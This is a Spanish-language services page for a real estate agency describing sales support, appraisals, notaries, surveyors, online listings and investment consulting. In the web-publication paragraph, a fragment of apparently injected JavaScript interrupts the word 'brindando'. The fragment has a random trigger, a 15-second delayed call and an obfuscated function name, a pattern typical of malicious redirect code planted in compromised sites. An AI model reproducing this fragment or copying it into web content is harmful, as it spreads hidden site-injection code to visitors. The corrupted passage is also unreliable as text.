Servicios Ofrecidos

VENTAS

Nuestra empresa se especializa en un servicio personalizado con la tecnología y el profesionalismo necesarios para llevar a buen término una negociación, siendo nuestro mayor objetivo la simultaneidad de operaciones que le permiten a nuestros clientes comprar y vender en un mismo acto y sin riesgo.

Asesoramiento Integral: en todas las etapas de una operación de compraventa.

Tasaciones: acordes con la realidad del mercado y realizadas por profesionales en la materia.

Escribanos: contamos con el asesoramiento de reconocidos escribanos de la zona para su mejor atención en el momento de realizar la escrituración de su propiedad.

Agrimensores: ofrecemos el servicio de agrimensores que facilitarán su tarea en el momento de sub-dividir una parcela de tierra.

PUBLICACIÓN WEB

Estamos convencidos que Internet es una herramienta de enorme valor para realizar negocios a distancia, por ello contamos con la tecnología y la capacidad de respuesta para desarrollar y llevar a buen puerto una transacción sin importar las distancias.

A través de nuestra página Web y los más destacados portales inmobiliarios del país, ofrecemos la totalidad de las ofertas que nuestra empresa pone en el mercado, brindandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la posibilidad de conocer los detalles, características y ubicación de cada una.
Disponemos de la visión de las propiedaes a la venta en imágenes satelitales.

Atención on-line con nuestros operadores para recibir la información solicitada desde el lugar donde usted se encuentre, sea en idioma inglés o español.

SERVICIOS COMPLEMENTARIOS

• Creacion y desarrollo de imagen de proyectos Inmobiliarios.
• Asesoramiento con Estudios de Arquitectura y con distintas empresas constructoras de primer nivel.
• Sistemas de construcción Llave en Mano.
• Evaluación de proyectos de inversión en el mercado inmobiliario.
• Canalización de capitales a proyectos inmobiliarios.
• Aplicación de proyectos inmobiliarios a capitales.
• Análisis de mercadotecnia.
• Contactos con compañías dedicadas al Real State en Estados Unidos y Europa.

Share Button